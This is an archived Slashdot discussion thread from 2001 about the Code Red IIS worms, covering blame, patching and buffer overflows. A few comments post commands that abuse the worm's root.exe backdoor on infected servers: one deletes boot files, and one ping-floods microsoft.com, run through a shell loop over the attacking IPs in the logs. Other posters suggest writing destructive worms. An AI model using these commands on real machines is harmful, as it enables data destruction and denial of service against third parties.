Preserve Wildlife -- Pickle a squirrel today! by HydroCarbon10synth903@hotmail.com) on Thursday September 07, @10:48AM NT#23)

You know lately I've been thinking recently about the sig system. I really think that 120 characters seems a bit restr -- by Valar nospamyalusers.kungfoo@linuxstart.com) on Thursday September 07, @11:07AM NT#74) (User #167606 Info)

"Don't anthropomorphize computers. They hate that." -- by poiu on Thursday September 07, @10:50AM NT#124) (User #106484 Info)

5 out of 4 People have problems with fractions. -- by fjordboy noneofyourbeeswax@noneofyourbeeswax.com) on Sunday September 10, @07:16PM EDT#116) (User #169716 Info)http://www.iceball.net

Never miss a good chance to shut up. -- by Aleatoricrsanders@webzone.net) on Monday September 11, @03:15AM EDT#46) (User #10021 Info)

Give me ambiguity or give me something else -- Re:That last ten percent... (Score:2, Informative) by seanmeistersubsynthesis@subdimension.com) on Wednesday September 20, @04:37PM EDT#53) (User #156224 Info)

The music business is a cruel and shallow money trench, a long plastic hallway where thieves and pimps run free and good men die like dogs. There's also a negative side. - Hunter S Thompson

Apocalypse n. Writings from Jewish authors... designed to cheer the hearts of the Jewish people (Webster) -- My password... (Score:1) by MrScience on Friday September 29, @12:06PM EDT#221) (User #126570 Info)"

If at first you don't succeed, it is quite certain you will give up skydiving. -- Maybe it just crashed? (Score:2, Informative) by LilGuy on Wednesday October 04, @04:44PM EDT#54) (User #150110 Info)

I'm a dyslexic agnostic with insomnia... I lie awake at night wondering if there really is a dog! -- Re:Electoral College (Score:1) by Q-Hack!kc5aot_HATES_SPAM_@qsl.net) on Thursday October 19, @09:49AM PDT#23) (User #37846 Info)http://www.qsl.net/~kc5aot

Sponsored by: Chork Lite - Because having an active lifestyle doesn't mean you have to give up jellied meat. -- by Towertwrau.p.dueirml@eo) on Tuesday May 01, @01:03PM EST#60) (User #37395 Info)

I'm in search of myself. If you found me before I arrive, please have me wait. -- by jsse on Wednesday May 02, @09:50PM EST#63) (User #254124 Info)

"Time's fun when you're having flies." - Kermit the Frog -- by joshyboy on Wednesday May 02, @09:31PM EST#17) (User #237516 Info)

...A no smoking section in a resturant is like having a no peeing section in a swimming pool... -- From whats been happing..... (Score:1) by SGDarkKnight on Monday May 07, @11:51AM EST#30) (User #253157 Info)

I'm in search of myself. If you found me before I arrive, please have me wait. -- Very bad case for US (Score:2) by jsse on Thursday May 17, @03:40AM EST#11) (User #254124 Info)

Swearing is the crutch of inarticulate mother fuckers. -- whitehouse.gov. IN CNAME hongkonggov.cn (Score:1) by xodiakbrad AT geeknet DOT net) on Thursday July 19, @03:45PM PDT#15) (User #95699 Info)http://www.pander.org/

If Bill Gates had a nickel for every time Windows crashed... ..oh wait, he does. -- by Nate Fox (slashdotatdafox.org) on Friday August 10, @11:00AM PDT (#54) (User #1271 Info)

-

Re:Slashdot Humor

[0vi_king]

Great collection. There needs to be a "classic slashdot" section, and this would be one of the exibits.

The guy does have a point

[TheMidget]

Certain Cisco routers crash when they get a Code Red probe. Supposedly, they have a builtin webserver for configuration purposes. So unplugging/replugging the router may occasionnally be necessary.

why doesn't it stop?

[matman]

I think that a large proportion of the infected machines are the desktops of users who just installed IIS along with the rest of everything because they didn't know what they needed and what they didn't. These are boxes that don't have systems admins to patch them. I'll bet that half of these people don't even know that they have IIS installed and if they do, they don't realize that they're infected since they're files are all still there and the virus hasn't popped up a HUGE message on their screen saying "YOU ARE INFECTED".

Re:why doesn't it stop?

gotta cut the cruft somehow

Re:why doesn't it stop?

[dermotfitz]

Well, I told the people where I work to go to windowsupdate.microsoft.com to get patches for the worm (jul 19) and they were greeted with "Hacked By Chinese".
We all know that now but after they downloaded all the recommended patches, the virus came back. Turns out you can't trust that site at all. It didn't recommend the patch that was needed. It didn't even recommend the SP2 for win2k.

Re:why doesn't it stop?

[linuxrochester]

If this is true (which I beleive some of it is), then Micro$haft should put the fix on the update site . If these people aren't computer savy enough to new what to install and what no to, chances are they are going to the update site through IE anyways.

Re:Microsoft should be sued

[IronChef]

Yes, I agree the current anti-gun-make suits are ridiculous. May as well sue Ford when an Escort is used as a getaway car.

Re:I think you're on to something...

[Fluid+Truth]

Whoops...the link is right, the text is not. There's no "www" in there. Just click. I promise it's not goatse.cx. :-)

Donate them to charity

[WillSeattle]

The lead story said: I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

You should donate them to charity. I hear Bill G could use them.

Re:It's not like they haven't announced the patch

[muffel]

But it would be insane to propose MS should force-feed this server patch to all their customers.

Microsoft never had problem trying to force-feed their products to every single bloody PC on this planet.
They simply don't give a sh*t. And why would they? As long as the press is kissing their butt, what's to worry about? The customer? Yeah, right.

Re:Tested, working... Effective.

[Russ+Nelson]

/root.exe?/c+del+/a+srh+/q+/f+c:\ntldr.*

Bye bye boot process...

I don't want to make the machine unbootable. I just want to disable Code Red.

-russ

Re:Bad piggyback, but..

[Charm]

It wastes vast amounts of bandwith.

It has had some ISP's disconnect internal port 80 connections. Resulting in some Apache or other webservers no longer being able to work. Yeah and patched IIS ones too.

It gives unix users a new hobby. Reading Code Red hits in their logfiles

It is a new FAD

Re:Microsoft should be sued

[norton_I]

A lot of people have said that other software packages can install IIS without telling the user about it.

I also don't know what the details of how to install IIS on W2KPro are, but I bet it isn't that hard to do "accidentally" -- If nothing else, I can see people just checking everything "just in case" without realizing that that meant that it would run automatically on boot.

Re:Stop addressing Code Red

[purplemonkeydan]

I've NEVER seen that before. What version of SQL were you installing?

Re:Buffer overflow vulnerabilities

[jrockway]

Then again, a java program that prints "Hello, World!" uses 100% CPU on my machine (G3/233, Debian/PPC). C++ doesn't have this problem.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:Microsoft feature?

[michael_cain]

At least by hearsay, the default installation of Win2K sets the box up to run IIS. In the cable modem networks (with which I am peripherally involved), I suspect that a large fraction of the infected machines are owned by people that do not know that they are "operating a server."

MS is not alone in this type of negligence. For far too long, Red Hat Linux installations defaulted to having sendmail run, and had it configured so it would forward e-mail.

Re:Redundant Response

different states/provinces/countries have different outtakes on that, depending on the severity

Re:Microsoft should be sued

[sbayne]

What if Mr. Schmoe wants to use his spiffy MS web authoring tool, Frontpage? or Visual Interdev? On win9x they'll both try to install the PWS. What do they do on NT/2k?

IIRC, the various dialogs are full of "without this feature, you will not get the full functionality..." messages, and NOT full of "You are installing an Internet Service, with all the responsibility that this implies" messages.

CR=TN?

Is Code Red = T.H.E N.E.T? Imagine when it's done..

Bill Gates to Apologize?

[bear_phillips]

Rember those ads that had Ford CEO Jacques Nasser saying "We are doing everything possible to fix this tire situation". Wouldn't it be cool if Bill Gates would do the same thing? Might be good for his PR.

Re:Bill Gates to Apologize?

[linuxrochester]

He won't apologize. That would be admitting that Micro$haft created an inferior product. His ego would never let that happen. Hopefully more people will just dump IIS and run real web servers

It's Quite Unfortunate.

[viper21]

Code Red won't be a huge problem until the script kiddies start to exploit the holes.

Those people posting apache logs of infected machines are just as guilty as those whom use those logs maliciously.

One would think that, even though this is "Microsoft's Fault", we would have some compassion and make an attempt to stop the damage where we can.

What a merry band we are. My box can't get infected, but here is a list of machines you can go exploit.

-S

Re:It's Quite Unfortunate.

[Gnea]

i bleeped out my IP, now pay attention and chew on your toenails some more ;)

Re:Copycats

Now that the Trilogy is finished it's time to work on the prequels .. All the special effects and all the l337 new characters in the world are not going to help it - but we can't let it die.

I've got a virus on my machine

[WillSeattle]

It keeps popping up these annoying ads every time I visit a web site, and leaving them under the browser window, so I have to close each one.

None of my antivirus software packages seem to be able to detect it, though ...

Re:One problem....

I don't understand how they couldn't know. I have installed quite a few NT 4 boxes and a couple of 2000, and I have never once seen IIS install itself. Is there something I am missing?

Re:Microsoft should be sued

[Keith+Russell]

yeah, this is true, but it is MS that has it turned on by default w/o letting the average user (which by the way is their intended target) know.

Only on server versions of NT or 2000. The average user will have some 9x mutation, which renders the point moot. No IIS, no exploit. The average 2000 user will install 2000 Professional which, while capable of running IIS, does not install it automatically. As I mentioned in an earlier post, you must go through a couple dialogs and explicitly check the IIS line item.

The only versions of 2000 that install IIS by default are all server variants. That target market damn well better know what they're getting. That won't include the average user. If they really want a web server, the sticker shock of 2000 Server will send them to Linux.

At the risk of being redundant..

[citizenc]

.. why doesn't somebody just code up a worm similar to Code Red, but applies the IIS server patch? It could be done anonymously, just like the worms are.. I'd do it myself, but I'm not a coder. =/

Re:At the risk of being redundant..

I know its bad to say, but mabey its time to write one that wipes the systems of the people who havent patched yet. Some people really should learn about computer security the hard way.

Stop addressing Code Red

[I_redwolf]

and start addressing the primary issue at hand. The issue is system administrators need to take proactive measures to make sure their systems have been patched. That's the problem and thats what needs to be addressed. There is nothing significantly fascinating about this program that deserves any noteriarty. It didn't find some weird flaw in design. It just exploits a buffer overflow which has always been a problem in peoples code. It's a really simple thing to fix at that. Enough about Code Red and more about the underlying problem.

Re:Stop addressing Code Red

[mpe]

Also, try going to the IP addresses in the log files - most of them are the "this page is under construction" default page from IIS. Looks like a web server installed as "that sounds cool", and not ever used.

Or more likely it gets installed by default and until CR came along no-one even knew it was there...

Re:Stop addressing Code Red

[kolding]

One problem is that some people don't even know they're susceptable. I just spent 2 hours removing Code Red xxx from NT Server, because I didn't know that I even had IIS on there. I put SQL Server on the box, and guess what, it installed IIS for me.

Re:Stop addressing Code Red

Except the problem isn't just sysadmins. It's also the home user who probably w4r3z'd his copy of Win2k, thought Internet Information Server was necessary for it to work, and has no idea his box is a webserver.

Re:Stop addressing Code Red

[Dr.+Smeegee]

Wow. That sucks. Was there no choice to _not_ install it?

Re:Stop addressing Code Red

[purplemonkeydan]

Microsoft (or any other software company) should be responsible for selling defective products.

Like RedHat? Put an unpatched RH 6.2 server on the Net and see how long it lasts.

Re:Stop addressing Code Red

[awilber]

You really think system administrators are the problem? I don't think so.

What do you think the ratio of code red infections on residential broadband customers boxen to code red infections on any system that actually has a system administrator is?

My guess is 10 to 1.

Re:Stop addressing Code Red

[RossyB]

A huge log analysis of the original Code Red attack shows over 60% of IPs were from Americal DSL/ISP users. aol.com, home.com, rr.com etc.

Also, try going to the IP addresses in the log files - most of them are the "this page is under construction" default page from IIS. Looks like a web server installed as "that sounds cool", and not ever used.

Re:Stop addressing Code Red

[i]Stop addressing Code Red and start addressing the primary issue at hand. The issue is system administrators need to take proactive measures to make sure their systems have been patched. [/i] [p] Bad analogy. Its more like, Microsoft sold you a car with seatbelts that work perfectly fine. But some guy keeps coming over and hitting them with a hammer. Should we expect them not to break? [p]

Re:Stop addressing Code Red

[KlomDark]

I really liked this quote (from the same article) too: This process [Security Insurance] changes everything. What will happen when the CFO looks at his premium and realizes that it will go down 50% if he gets rid of all his insecure Windows operating systems and replaces them with a secure version of Linux? The choice of which operating system to use will no longer be 100% technical. Microsoft, and other companies with shoddy security, will start losing sales because companies don't want to pay the insurance premiums. In this vision of the future, how secure a product is becomes a real, measurable, feature that companies are willing to pay for...because it saves them money in the long run.

Re:Stop addressing Code Red

[Ratbert42]

Exactly. I'm a lazy sysadmin. I hate applying patches every week. So I do a good job securing the box in the first place so I don't have to. But lots of sysadmins are worse than lazy. They're stupid.

I manage one IIS server and have to deal with sysadmins who manage another 6 or so IIS servers. My server is the only one that doesn't have the default mapping of the .ida extension to the index server DLL. Nobody else is using index server, but they ignored (or never even read) Microsoft's own documents about securing IIS. When the next buffer overflow in an unused DLL is found, their servers will be vulnerable and mine won't be.

I got to do a post mortem on one IIS server at my company that was infected with CodeRed.v3 (call it what you want, it's the XXXXX one). How did they notice that the box was infected? Did they notice the increased traffic? Nope. Did our intrusion detection system catch it? Nope -- it hasn't been updated in months. So how did they find out? When I recognized their internal IP in my logs, attacking my server. Another admin came in to fix it. He applied the Microsoft patch for the .ida vulnerability and rebooted. That's it. He didn't close any of the backdoors or anything. I sent him and his boss an e-mail with links to the backdoors on his box and a list of what to fix.

Re:Stop addressing Code Red

[ryanvm]

Stop addressing Code Red and start addressing the primary issue at hand. The issue is system administrators need to take proactive measures to make sure their systems have been patched.

Bullshit. Do you also think that someone should have to constantly replace the seatbelts in their car because they just spontaneously break?

Microsoft (or any other software company) should be responsible for selling defective products.

Re:Stop addressing Code Red

[Geoff]

The issue is system administrators need to take proactive measures to make sure their systems have been patched. That's the problem and thats what needs to be addressed.

Sysadmins aren't entirely at fault. Certainly, this particular problem has received enough coverage that there really shouldn't be any unpatched IIS installations any more (but there are, sigh), but the other side is that it's pretty near impossible to keep up with every patch to every system.

Here's a good rant on the subject entitled The Security Patch Treadmill. It was written in March 2001, before Code Red. It still applies. A quote:

Those who manage computer networks are people too, and people don't always do the smartest thing. They know they're supposed to install all patches. But sometimes they can't take critical systems off-line. Sometimes they don't have the staffing available to patch every system on their network. Sometimes applying a patch breaks something else on their network. I think it's time the industry realized that expecting the patch process to improve network security just doesn't work.

Re:Stop addressing Code Red

[nether]

Take note that the patch is vulnerable. If your server is redirecting URL's, then the patch will not work for you. Take a look here: http://archives.neohapsis.com/archives/incidents/2 001-08/0218.html

Re:Stop addressing Code Red

[why-is-it]

Microsoft (or any other software company) should be responsible for selling defective products

Read the EULA. Their products are sold without any sort of warranty (real or implied) and by clicking I accept the user agrees not to hold micro$oft liable for anything.

Re:Is this a trick from Hollywood?

[tsa]

You should watch more movies.

Re:Microsoft should be sued

[daviddennis]

As you must know, their own license agreement says they cannot be sued for their software, and that all you have really bought is a funny-looking silver coaster and a piece of paper or two.

This industry as a whole is a castle of sand with the tide rapidly coming in, but nobody cares to admit it.

D

Pretty devestating DoS attack in the making

[Bonker]

GET /scripts/root.exe?/c+ping+"www.microsoft.com"+"-t -l 4096 -i 9999"

Let's see just how many boxen we can get slamming MS at once...

Re:Pretty devestating DoS attack in the making

[crouchingpenguin]

if you have the GET perl script or equiv, this might be fun:

for address in `zgrep 'default\.ida\?' access.log* |awk '{print $1}' |cut -f2 -d':'`;do GET http://$address/scripts/root.exe?/c+ping+"www.micr osoft.com"+"-t -l 4096 -i 9999";done

Re:Pretty devestating DoS attack in the making

[sfe_software]

This would be cool, except that microsoft.com's firewall drops ICMP packets -- eg, you can't ping them.

- Jman

The Code Red hype Hall of Shame

[wiredog]

From The Register

Can't wait for WinXP

[telbij]

Although I can't say I agree with the tactics, these MS attacking virii may be the best advertisement for OSS in years. I wonder if that's the motivation behind them, or if it's just random delinquency :) I can't wait to see the crackers feast on Win XP.

Re:ok you bigots :)

grep -ic default.ida /var/log/httpd-errors.log (how many hits are you at now?)

Re:Put it in another log and forget about it.

[Sauron23]

I found this on the securityfocus mailing list:

cat error_log error_log.1 | grep 'default.ida' | awk '{print $8 " " $1 " " $2 " " $3 " " $4 " " $5}' | sed s/[][]/" "/g > myreport.txt

Which then really begs the question; Now what should I do with this list of compromised machines? oh never mind...

Re:Microsoft should be sued

[Syberghost]

And what do you do if your server runs third-party software that can't run with Service Pack 6?

Microsoft unfortunately has chosen to integrate IIS so tightly with the operating system, that to upgrade one is to upgrade the other.

Some folks are in a real pickle, and don't have the knowledge to get out of it in a short period of time.

Re:Code Red 'counter'

[Asgard]

DShield.org, a distributed IDS, would like you to do the following:

grep 'default.ida' access_log | mail -s 'APACHE' redalert@dshield.org

They use this information to notify the owners of the machines of the infection and to track the progression of the worm.

It would backfire

[snilloc]

Ford was trying to counteract negative press by shifting the blame to Firestone.

Gates holding a press conference about Code Red would only hurt his PR - it would burst the PR bubble he's been taking advantage of :"Computer worm" -vs- "Microsoft worm".

Plus, what else is MSFT supposed to do? A (partial?) patch is already out. Gates can't say "we're doing everything we can" because it would imply that he can do more, and that MSFT is at fault. It would only enhance the association of Code Red with MS.

Re:It would backfire

[Tony-A]

Besides, it seems that Microsoft can't even patch their own servers. MS internal network whacked by Code Red

Re:It's not like they haven't announced the patch

[b1t+r0t]

There's also the subtle difference that flaws in Microsoft products don't kill people.

Yet.

The US Navy is giving it a good try, though.

Re:Buffer overflow vulnerabilities

[Macrobat]

Tell you what. Show me the source for an OS coded in Java, I'll see if I can't find buffer overflow risks in it.

no ... its more like

[ReidMaynard]

you bought a submarine with screen doors.

Anyone who build a sub should realise it will be under water.

Anyone who developes OS/Server code should realise it will be under attack.

Re:Microsoft should be sued

[Ummagumma]

I totaally disagree here. When you buy a car, noone tells you that it has the potential to kill people, if used improperly, or not taken care of. Same thing applies here. Its time for people to start taking responsibility for thier own actions (inactions), and not pointing the finger elsewhere. They sysadmins (yes, even the cablemodem people who simply installed the software and walked away) are the responsible parties here.

Re:Why people love Code Red

You -- like everybody else -- know exactly jack shit about who writes this stuff.

Python has no buffer overflow problems.

[Russ+Nelson]

Python has no buffer overflow problems. Neither does Perl. Okay, so .... what does that tell you? Is this something that has "always been a problem in people's code."? Or is it something in the C library that encourages buffer overflows?
-russ

Re:Python has no buffer overflow problems.

Yes and no. Part of the problem is C in that their is no bounds checking as a feature of the language. The other part of the problem is that certain libraries do have bounds checking as a feature of the library. Solaris 8 allows the executable stack to be shut off which is a feature of the OS.
The attitude to take with C is that it allows you to build a secure library. If you build a car with no locks it is not the fault of the raw materials which in this case is the primitive C language all on its own.

Re:Python has no buffer overflow problems.

[Russ+Nelson]

Nahhahhh. Dan Bernstein uses a different C library in his programs like qmail and djbdns and manages to avoid shooting himself in the root.
-russ

Re:Python has no buffer overflow problems.

[greenrd]

It's not something in the C library, it's something in C itself - it allows you to shoot yourself in the foot very easily. Which can be a good thing or a bad thing, but mostly, I think, a bad thing.

Re:I saw that Reuters story earlier

Of course it will work fine on a cable network..you can block the MAC address of the cable modem itself. Poof! Gone. RoadRunner definitely has the capability to do this.

Re:M*derators!

[cyberdonny]

> Why is that moderated to 0, Troll? That was both funny as hell, and a good idea!

Your post seems to have been moderated down as well. This seems to happen very often with posts discussing moderation. It's so common, it's almost caricatural: apparently some moderators can't stand it if you question their moderation skills. If anybody from the Slashdot crew is reading this, may I propose the following safeguard against such moderation abuses:

• If a post has moderator (case insensitive) in the title, and...
• ... a moderator has already moderated any direct or indirect parent of said post...
• ... then the same moderator cannot moderate this post.

It would be relatively safe against abuse (for example, just putting moderators in the title of posts linking to a certain well-known site on the Christmas Islands...) as all the other moderators could still mod it down. Only the moderators who have modded down or up one of the parents would be barred.

As an addition, we could remove Offtopic from the moderation menu for any "moderators" post. Although discussion about moderation is not, strictly speaking, on topic, I think these meta-discussions are still justified. You would still be able to moderate them down as Flamebait or Troll, just not as Offtopic (as long of course, as you didn't mod a parent).

Re:Saddens me though

[TheMidget]

> Linux and Apache are compatible. I'm running Apache on Linux right now. :)

The comment you were replying too was moderated as funny, so it must be some kind of joke. Don't worry though, I don't get the joke either... Or is this just a parady of the "The next version of Linux will support SCSI", "Linux doesn't have a GUI", "Word is so much better at typesetting math than LaTeX" or "IE outperforms all Linux browsers, even when running in VMware" type affirmations that you still occasionnally see in some traderags of ill repute?

Why people love Code Red

[Laplace]

The newsmakers love it because they get to print lots of muckracking headlines about "another hacker threat," and the "evil red chinese attack on the good guys." A scary computer virus means ratings!

Microsoft loves it because they get to release patches, and proclaim to the world "we're the good guys, protecting you from those unamerican people who share code!"

The lawmakers get shits and giggles because now they have a reason to pass new, more restrictive laws regarding comminication across "the information superhighway."

The prison system salivates over this sort of stuff. It creates more potential for 15 year old kids to be thrown in prison for essentially victomless crimes. Nothing like young ass for the seasoned prison rapists!

Open source fanatics get another nit to pick with big bad Microsoft. Go free software! No, go open source! No, go free software!

News like this is the best kind around.

Re:Why people love Code Red

[spack]

It really turns my stomach when I think about how close to the truth your statement is. My hope from all this is that it will convince more people/admins/companies/etc to try Linux. It's just a hope.

Re:Why people love Code Red

[aozilla]

If one of them breaks into a system and destroys data or defaces a Web site, what do you propose we do with him?

Nothing. You should have a backup.

Alternatively, if the victim wants to hire a private investigator to catch the kid, and then file a civil lawsuit against him, I'm fine with that. But I don't want my tax money paying for your stupidity. You'll get no help from the DA, no help from the FBI, no help from any law enforcement, you can pay for the court costs yourself (possibly getting it back from the kid if you win the lawsuit and he's not broke), and you won't get my money to feed this kid and put bars around him.

Don't go and compare this to someone whose house is broken into because s/he didn't lock the door. First of all, there is physical harm involved. Secondly, it is impossible to guard 100% against a physical break in. Whereas an electronic break-in is trivial to guard against.

Re:Why people love Code Red

[SomeoneYouDontKnow]

Are you saying that writing and distributing viruses is a victimless crime? Try telling that to someone whose system has just been wiped out.

IMHO, if the little snot-nosed 15-year-old script kiddies don't know what they're doing is wrong, then some time in the can might be just what they need. I love it when people try to excuse their behavior by saying they lack social skills and need direction to give them a sense of morality. No, these kids do what they do because they think they'll get away with it and that there'll be no consequences for them. Let them face the music. If that means some jail time, so be it.

Re:Why people love Code Red

[aozilla]

It's impossible to guard 100% against any kind of break-in.

Absolutely positively untrue. Don't connect the machine to the internet. That guards 100% against an electronic breakin over the internet (which is what we're talking about here).

What's that, you want to allow people to connect to your machine? OK. What do you want to let them do? For any set of things you want to allow them to do, it is possible to set the machine up so that nothing else is possible.

You say a physical break-in is different than an electronic one because there's damage in a physical break-in and not in an electronic one. How is the damage different?

I guess the physicalness isn't the difference. One could argue that the bits on the hard drive are physical. Certainly hooking up your computer to a hammer which breaks your windows if you send it the proper code is physical. The difference is that you are explicitly enabling the damage. If I tell you that if you send me an email I'm going to format my hard drive, should it be illegal for you to send me an email? What if I set up a script which does that automatically?

I have a natural right to be secure in my home. I have a natural right to have my property in my home be secure. I am willing to pay taxes to the government to secure my natural rights and the natural rights of others. I don't have a natural right to run a web server. I don't expect the government to help me run a web server, and I do not want to pay taxes to the government to help others run a web server.

Suppose someone was able to hack a computer at your local power company and black out half the state?

The power company should be sued for negligence. There is no reason for it to be hooked up to the internet, and I highly doubt it is.

Suppose someone launches a DoS attack against your ISP for a day, and your Internet access is rendered useless.

Read your contract. There is probably no responsibility on the part of the ISP. As for the ISP, they can feel free to sue the person if they catch him/her.

Suppose someone mailbombs you because they got pissed off with something you said on a newsgroup. I've been through that, too. Even if there's no physical damage, there's damage caused by wasted time and productivity.

Suppose there's an earthquake and all my windows break? It's not my responsibilty to fix your windows. That's what better windows and insurance is for. You shouldn't set up a server which allows an unlimited number of anonymous emails to be sent to you if that's not what you want to allow. If you want to guard against your own mistakes, feel free to buy insurance.

If you're worried that he won't have the money to pay, then also worry about the victims of such attacks who don't have the money to bankroll their own investigations.

That's what insurance is for. Like I said, I don't feel I have an obligation to help you run a webserver.

Re:Why people love Code Red

[SomeoneYouDontKnow]

Perhaps you weren't paying attention to this thread and what I was commenting on. Read more carefully before you post.

But since you brought it up, perhaps you'll enlighten everyone here as to who's writing this stuff. And be sure to use lots of small words so we'll understand.

Re:Why people love Code Red

[Afrosheen]

"Are you saying that writing and distributing viruses is a victimless crime?"
Virii, maybe. Worms that target easily cracked M$ servers...maybe not.
If that means some jail time, so be it.
Jail is the answer for everything isn't it? I suppose it has nothing to do with the breakdown of society to the point where nobody is supervising children while they learn to write and distribute virii/worms. Blame the parents, even if they're 'technically illiterate'. It's their job to get literate. Would you buy your kid a car if you didn't know how to drive one?

Re:Why people love Code Red

[shepd]

Do what people always used to do when kids were bad, or made mistakes. Make the kid pay for the damage, literally.

The teenager could:

- Repair the webserver they trashed (under supervision). This would be good experience and would direct the teenager's "hacking" abilities in an appropriate direction. This is only good for a minor offense, as the average script kiddie isn't going to have the slightest clue about setting up a real server. This option also forces the teen to learn through personal experience what damage their acts cause (I wouldn't be surprised if script kiddies are thinking about the thrill of the hack, rather than the consequences when they hack -- this might make them do the latter).

You need to take more caution with that option than the latter. The teenager might enjoy the punishment and become worse. Perhaps making them do volunteer technical support for the company would be less enjoyable? :-)

or:

- Pay for the repair. Make the teenager get a job, and hold it long enough to pay a couple of thousand dollars for repairs and perhaps they might learn some respect for other's property through "hard time". This is a little more foolproof.

It's only if options like that fail that they need to see some more serious punishments, IMHO.

It's like a kid breaking a window. The first time the parents' should make the kid apologize for doing it and the parents' should pay for the repair. The second time the kid pays for the repair. The third time... well, I don't know. I don't think there's usually a third time for a well balanced kid.

Re:Why people love Code Red

You say a physical break-in is different than an electronic one because there's damage in a physical break-in and not in an electronic one. How is the damage different?

Another point to consider is that if the two acts are identical (more specifically, if one is a subset of the other), why do we need a law against both of them?

Re:Why people love Code Red

[tapin]

Of course virus writing is a victimless crime. Like punching someone in the dark.

-Tapin (ha-ha!) Muntz.

Verizon DSL

[asmithmd1]

I talked to the Verizon support center and they told me port 80 into their network will be blocked until the code red worm dies down, probably 2-3 weeks, but that is not a commitment. I then asked to be released from my year long contract I signed to get a free DSL modem and web cam since they broke their contract (no changes in service without 7 weeks notice) and they said no, cancellation charges would still apply. Anyone starting a class action suit?

Re:CodeRed Information

[baptiste]

It was also mentioned yesterday that NT4 servers that have been patched are still vulnerable to CR2 if they're using redirection. This seems odd to me

Seems odd to me too since Code Red II (not CRv2) can't infect NT servers - it just crashes them when it tries to run due to a bogus jump table that only works with Win 2K.

From the Code Red II analysis: This worm, like the original Code Red worm, will only exploit Windows 2000 web servers because it overwrites EIP with a jmp that is only correct under Windows 2000. Under NT4.0 etc... that offset is different so, the process will simply crash instead of allowing the worm to infect the system and spread.

Please stop bragging about apache...

[wrinkledshirt]

Crackers are fueled by the challenge and payoff of getting into what was once considered the uncrackable site. The higher the profile, the better, that's one of the reasons MS software is such a target. Start talking trash about how IIS sucks compared to apache and methinks you'll end up with more security hole notices about apache than you'd like, courtesy some guy who enjoys dealing with hubris.

Re:Please stop bragging about apache...

Um, have you heard about this Code Red thing yet?

Re:Please stop bragging about apache...

[MaxwellStreet]

See? If I were a virus-writer motivated as you described, I'd most certainly go after the world's most popular web server.

An Apache server is more than twice as common as one running IIS - hard to imagine any web server higher profile than that.

And hubris? People have been talking smack about IIS for years here. But that mythical guy "enjoys dealing with hubris" will never find an example more egregious or tempting than the Gates/Ballmer/Mundie/Microsoft machine.

Re:Please stop bragging about apache...

The higher the profile, the better, that's one of the reasons MS software is such a target.

Windows get's targeted because it's the most common OS. Apache is the most common web server; why isn't apache targeted? Nothing MS is known for it's great security or reliability; Why is it always the MS product that gets hit with a virus/worm? Because it's easy.

Perhaps this is what we need

I wonder if that gentleman at the Ministry of Information will be providing us with Kwang-sup Grade 11...

Suite?

Is that when all the plaintifs have to stay in the same hotel room?

So hard to keep up

[snakecoder]

God, I'm still on version 1 of code red. Does anybody know where I can download the latest version? Is there a mail list I can get on so I know I have the lasted version on my IIS server?
Tnks.

Re:Someone should post the IP addresses.

[gleam_mn]

Screw'em! Can some please just release a new CR version that contains the IPs of the unpatched servers so that when they all switch from infect to attack mode they can just DDOS each other to death. If you haven't patched your server by now then I hope it catches fire!

Re:Microsoft should be sued

[djocyko]

To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected.

From: Support@iis.microsoft.com
To: Registered_Users@iis.microsoft.com
CC:
Subject: RE: IIS Code Red Worm Patch
Attachment: Instructions.doc
Body:

Hi, how are you?

We are writing you in response to the Code Red worm that has recently attacked our premium enterprise gold standard web portal system, Microsoft Internet Information Server. We have compiled a set of directions for patching the server, and have included these instructionsin a easy to read Word document. If MS Outlook didn't automagically open this attachment for you, double click on the attachment link above.

If you have any advice on this file, please email us back!

See you later!

Code Red Vigilante

There a java program that emulates IIS servers and waits for a GET /defualt.ida request and then warns them. It exploits their security hole to do a netsend from their local machine to themselves explaining they are victims of codered and a link to visit to fix it. Here is the link for the program: http://www.dynwebdev.com/codered/

Re:Buffer overflow vulnerabilities

[mpe]

The buffer overflow we're talking about is not in an OS kernel (Windows), but in an application (the IIS webserver), for chrissakes!

How big a distinction does Microsoft draw between "kernel" and "application" anyway? After all they are always on about "integration"...

Re:Perhaps REAL Damage will Fix the Problem

[mpe]

What we really need is a variant of Code Red that compleatly hoses any computer that it hits -- something that people can't overlook.

It can't do this too quickly or it wouldn't get that many of them. Also people would just reformat and reinstall. "Evolution" dosn't work very well with "reincarnation" :)

Here's an awkscript to profile unique CR attacks

[sanermind]

Try this little awkscript:

cat /var/log/http/access_log | grep "default.ida" | awk '/XXXXX/{ cr[$1]=$4"\tCodeRedII"} /NNNNN/ { cr[$1]=$4"\tCodeRed_Original" } END { for (x in cr) print x"\t"cr[x] }' > codered_analysis

This creates a file, codered analysis, which contains each unique attacking host only once, with the most recent attack time. This way, you can look at the attacking machines without duplications, and can also `wc' the file to see how many unique ones have hit you.

Plus, it detects the difference between CR1 and CR2 too!

Interesting log enrtry

There is an entry in my apache access log as follows authorized-scan1.security.home.net - - [09/Aug/2001:15:41:08 -0700] "HEAD" 400 -

Re:make some money off banner ads

Yup we all can see that. Hopefully you get over it and move to a less challenging career like janitorial work.

Re:Is this a trick from Hollywood?

No trick. Apparently some really big companies are being hammered by this too. A large networking company from up North apparently had IIS running by defualt in the images of Win 2K it installed on new laptops and desktops - promotes employee collaboration, etc. Now, understand that their Intranet is pretty much walled off from incoming traffic. But somehow Code Red II got in, either via a suspended infected laptop or a VPN split tunnel (infection comes in and goes out the IPSec tunnel) Apparently their network went nuts as all these Win 2K boxes on very close networks started hammering the hell out of each other @ 10-100MBps switched.

needless to say they disabled split VPN tunnels but by then it was too late. It took them days to get it under control.

Re:Microsoft should be sued

[IronChef]

I'm a gun nut, but even I will say that a maker of a defective gun should be liable. If it explodes in your hand, that's an issue. IIS is exploding in a way, and MS should be liable.

My view is very simple: Things you buy shouldn't suck.

Re:Buffer overflow vulnerabilities

[Macrobat]

True. I was, however, responding more to the original poster, loki4eng:

Is what happens when you code your OS in C++. Sorry all you C++ dudes, but you know it's true.

--in my rush to defend the language, I got suckered into responding to someone who's either a script kiddie or a troll, or both.

Re:It's not like they haven't announced the patch

[phutureboy]

Hehe. That reminds me of something that I just saw in the bank drive-thru.

There are these little video screens on each of the whooshy-tube things you pull up to. They normally cycle through a whole bunch of ads for the bank's latest products and services. This time, however, there was a Powerpoint error message on the screen. Something or other about 'Powerpoint has encountered an error it cannot fix. Please close the application and restart.'

Well, I found it amusing.

